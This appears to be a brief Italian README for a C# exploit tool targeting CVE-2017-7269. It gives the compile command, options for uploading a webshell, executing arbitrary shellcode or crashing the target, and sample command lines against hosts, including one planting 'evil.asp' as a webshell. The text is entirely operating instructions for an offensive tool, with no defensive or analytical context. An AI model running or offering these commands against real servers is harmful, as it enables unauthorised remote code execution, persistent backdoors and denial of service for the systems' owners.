
CVE-2017-7269 per webshell o shellcode loader
csc cve-2017-7269.cs
CVE-2017-7269 <url> [parms]
Intestazione:
-h <host> imposta host per intestazione [If]
-p <port> imposta porta per intestazione [If]
-s <scheme> imposta schema per intestazione [If]
-l <length> lunghezza del percorso fisico
WebShell:
-w <webshell> carica webshell sul server
-wp <shellpath> percorso della webshell da salvare
ShellCode:
-c <shellcode> esegui lo shellcode
Varie:
-t testa solo la vulnerabilità.
-e esce dal processo dopo getshell o test
-k kill target (equivalente a -e e -t)
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin